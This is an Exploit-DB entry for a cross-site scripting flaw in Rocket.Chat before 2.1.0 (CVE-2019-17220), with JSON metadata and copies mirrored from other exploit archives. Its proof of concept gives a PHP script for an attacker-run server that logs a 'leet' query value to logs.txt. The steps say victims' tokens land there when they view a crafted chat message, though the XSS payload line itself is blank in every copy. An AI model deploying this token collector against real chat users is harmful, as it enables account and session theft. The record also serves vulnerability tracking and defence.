ID EDB-ID:47537
Type exploitdb
Reporter 3H34N
Modified 2019-10-23T00:00:00
Description
# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting
# Author: 3H34N
# Date: 2019-10-22
# Product: Rocket.Chat
# Vendor: https://rocket.chat/
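# Vulnerable Version(s): Rocket.Chat < 2.1.0 (the CVE-2019-17220 entry likewise reads "before 2.1.0"; the 2.1.0 in the title is the first version outside the affected range)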
# CVE: CVE-2019-17220
# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)
# PoC
# 1. Create l33t.php on a web server
<?php
// Collector endpoint from the PoC: appends whatever arrives in the `leet`
// query parameter to logs.txt. Per step 4 of this advisory the logged value is
// the target's token, presumably sent by the target's browser when the message
// is displayed.
// Defender note: a request from a chat client to an external host carrying a
// `leet=` query parameter is the network-visible trace of this PoC as written.

// "a+" opens logs.txt for reading and appending; the script stops with the
// message below if the open fails.
$output = fopen("logs.txt", "a+") or die("WTF? o.O");
// The query-string value is taken as-is, with no validation, and followed by
// two newlines that separate one logged entry from the next.
$leet = $_GET['leet']."\n\n";
fwrite($output, $leet);
fclose($output);
?>
# 2. Open a chat session
# 3. Send payload with your web server url

# 4. The token will be written to logs.txt when the target views your message.
{"id": "EDB-ID:47537", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Rocket.Chat 2.1.0 - Cross-Site Scripting", "description": "", "published": "2019-10-23T00:00:00", "modified": "2019-10-23T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://www.exploit-db.com/exploits/47537", "reporter": "3H34N", "references": [], "cvelist": ["CVE-2019-17220", "2019-17220"], "immutableFields": [], "lastseen": "2022-01-13T05:32:01", "viewCount": 176, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-17220"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:1D776637493F3A160A307862D89B339B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154944"]}, {"type": "zdt", "idList": ["1337DAY-ID-33405"]}], "rev": 4}, "score": {"value": 4.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2019-17220"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:1D776637493F3A160A307862D89B339B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154944"]}, 
{"type": "zdt", "idList": ["1337DAY-ID-33405"]}]}, "exploitation": null, "vulnersScore": 4.3}, "sourceHref": "https://www.exploit-db.com/download/47537", "sourceData": "# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting\r\n# Author: 3H34N\r\n# Date: 2019-10-22\r\n# Product: Rocket.Chat\r\n# Vendor: https://rocket.chat/\r\n# Vulnerable Version(s): Rocket.Chat < 2.1.0\r\n# CVE: CVE-2019-17220\r\n# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)\r\n\r\n# PoC\r\n# 1. Create l33t.php on a web server\r\n\r\n<?php\r\n$output = fopen(\"logs.txt\", \"a+\") or die(\"WTF? o.O\");\r\n$leet = $_GET['leet'].\"\\n\\n\";\r\nfwrite($output, $leet);\r\nfclose($output);\r\n?>\r\n\r\n# 2. Open a chat session\r\n# 3. Send payload with your web server url\r\n\r\n\r\n\r\n# 4. Token will be written in logs.txt when target seen your message.", "osvdbidlist": [], "exploitType": "webapps", "verified": false, "_state": {"dependencies": 1645536178}}
{"zdt": [{"lastseen": "2019-12-04T02:03:11", "description": "Exploit for linux platform in category web applications", "cvss3": {}, "published": "2019-10-23T00:00:00", "type": "zdt", "title": "Rocket.Chat 2.1.0 - Cross-Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-17220"], "modified": "2019-10-23T00:00:00", "id": "1337DAY-ID-33405", "href": "https://0day.today/exploit/description/33405", "sourceData": "# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting\r\n# Author: 3H34N\r\n# Product: Rocket.Chat\r\n# Vendor: https://rocket.chat/\r\n# Vulnerable Version(s): Rocket.Chat < 2.1.0\r\n# CVE: CVE-2019-17220\r\n# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)\r\n\r\n# PoC\r\n# 1. Create l33t.php on a web server\r\n\r\n<?php\r\n$output = fopen(\"logs.txt\", \"a+\") or die(\"WTF? o.O\");\r\n$leet = $_GET['leet'].\"\\n\\n\";\r\nfwrite($output, $leet);\r\nfclose($output);\r\n?>\r\n\r\n# 2. Open a chat session\r\n# 3. Send payload with your web server url\r\n\r\n\r\n\r\n# 4. Token will be written in logs.txt when target seen your message.\n\n# 0day.today [2019-12-03] #", "sourceHref": "https://0day.today/exploit/33405", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2019-10-24T23:13:32", "description": "", "published": "2019-10-23T00:00:00", "type": "packetstorm", "title": "Rocket.Chat 2.1.0 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-17220"], "modified": "2019-10-23T00:00:00", "id": "PACKETSTORM:154944", "href": "https://packetstormsecurity.com/files/154944/Rocket.Chat-2.1.0-Cross-Site-Scripting.html", "sourceData": "`# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting \n# Author: 3H34N \n# Date: 2019-10-22 \n# Product: Rocket.Chat \n# Vendor: https://rocket.chat/ \n# Vulnerable Version(s): Rocket.Chat < 2.1.0 \n# CVE: CVE-2019-17220 \n# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp) \n \n# PoC \n# 1. 
Create l33t.php on a web server \n \n<?php \n$output = fopen(\"logs.txt\", \"a+\") or die(\"WTF? o.O\"); \n$leet = $_GET['leet'].\"\\n\\n\"; \nfwrite($output, $leet); \nfclose($output); \n?> \n \n# 2. Open a chat session \n# 3. Send payload with your web server url \n \n \n \n# 4. Token will be written in logs.txt when target seen your message. \n`\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/154944/rocketchat210-xss.txt"}], "cve": [{"lastseen": "2022-03-23T21:27:48", "description": "Rocket.Chat before 2.1.0 allows XSS via a URL on a ![title] line.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2019-10-21T21:15:00", "type": "cve", "title": "CVE-2019-17220", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-17220"], "modified": "2019-10-23T20:15:00", "cpe": [], "id": "CVE-2019-17220", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-17220", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "exploitpack": [{"lastseen": "2020-04-01T20:40:37", 
"description": "\nRocket.Chat 2.1.0 - Cross-Site Scripting", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2019-10-23T00:00:00", "title": "Rocket.Chat 2.1.0 - Cross-Site Scripting", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-17220"], "modified": "2019-10-23T00:00:00", "id": "EXPLOITPACK:1D776637493F3A160A307862D89B339B", "href": "", "sourceData": "# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting\n# Author: 3H34N\n# Date: 2019-10-22\n# Product: Rocket.Chat\n# Vendor: https://rocket.chat/\n# Vulnerable Version(s): Rocket.Chat < 2.1.0\n# CVE: CVE-2019-17220\n# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)\n\n# PoC\n# 1. Create l33t.php on a web server\n\n<?php\n$output = fopen(\"logs.txt\", \"a+\") or die(\"WTF? o.O\");\n$leet = $_GET['leet'].\"\\n\\n\";\nfwrite($output, $leet);\nfclose($output);\n?>\n\n# 2. Open a chat session\n# 3. Send payload with your web server url\n\n\n\n# 4. Token will be written in logs.txt when target seen your message.", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}